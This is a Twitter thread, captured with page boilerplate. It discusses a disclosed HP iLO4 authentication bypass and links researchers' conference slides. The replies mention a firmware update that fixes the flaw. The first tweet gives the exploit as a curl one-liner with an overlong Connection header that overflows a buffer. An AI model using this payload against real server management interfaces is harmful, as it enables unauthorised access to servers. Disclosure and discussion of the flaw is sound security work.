HP iLO4 authentication bypass: curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA" No, that's not a crash PoC. That's a full blown auth bypass. sscanf into fixed buffer overwrites a flag field that bypasses auth. Yes, really. https://airbus-seclab.github.io/ilo/SSTIC2018-Slides-EN-Backdooring_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf …
-
-
It’s OK, latest HP server use Intel AMT. I guess it was cheaper than the iLO HW and SW. I swore no more HP for me anymore
-
Hmm? Just updated my iLO4 in an (old) Gen8 to 2.60 and that fixed it. This download and the SystemPAQ (against Meltdown and Spectre) were free w/o service agreement or license...
- Show replies
New conversation -
-
-
They are not. They outsourced the listening department 20 years ago and 5 years later, closed it altogether.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
I can recommend SuperMicro.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.